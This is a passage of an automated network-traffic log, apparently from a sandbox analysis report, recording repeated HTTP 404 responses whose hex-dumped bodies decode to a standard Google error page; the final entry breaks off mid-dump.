                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 